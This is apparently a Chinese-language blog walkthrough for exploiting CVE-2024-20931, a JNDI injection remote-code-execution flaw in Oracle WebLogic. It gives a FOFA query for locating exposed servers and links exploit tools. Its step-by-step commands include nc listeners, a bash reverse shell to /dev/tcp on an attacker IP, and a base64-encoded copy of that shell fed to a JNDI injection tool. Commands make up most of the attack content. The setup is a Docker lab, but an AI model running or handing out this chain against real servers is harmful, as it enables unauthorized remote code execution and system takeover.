CVE-2024-20931
## 简介 Oracle WebLogic Server存在JNDI注入漏洞,攻击者可通过构造恶意请求,导致远程代码执行。 ## 影响版本 - 12.2.1.4.0 - 14.1.1.0.0 ## FOFA ``` "WebLogic Server 版本: 12.2.1.4.0" ``` ## 漏洞利用 ### 环境搭建 Docker环境: ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-1.png) 访问web界面: ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-2.png) ### 漏洞验证 #### 漏洞利用工具 Github:*https://github.com/dinosn/CVE-2024-20931* ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-3.png) #### 开启nc监听 ``` nc -lvnp 8868 ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-4.png) #### 运行漏洞利用工具 ``` java -jar CVE-2024-20931.jar ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-5.png) 收到主机请求,说明漏洞存在 ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-6.png) ### 漏洞利用 #### JNDI注入工具 Github:*https://github.com/welk1n/JNDI-Injection-Exploit* #### 生成反弹shell命令 工具地址:*https://www.revshells.com/* 原始命令: ``` bash -i >& /dev/tcp/10.159.58.152/8868 0>&1 ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-7.png) #### 启动JNDI注入工具 ``` java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNTkuNTguMTUyLzg4NjggMD4mMQ==}|{base64,-d}|{bash,-i}" -A "10.159.58.152" ``` 记住LDAP的地址 ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-8.png) #### 开启本地监听 ``` nc -lvnp 8868 ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-9.png) #### 运行漏洞利用工具 在工具中输入LDAP地址 ``` java -jar CVE-2024-20931.jar ``` ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-10.png) 查看nc反弹shell,完成命令执行 ![](https://blog.coolcooltomato.com/uploads/article/CVE-2024-20931-11.png)
创建时间:2024-03-31
|
最后修改:2024-03-31
|
©允许规范转载
酷酷番茄
首页
文章
友链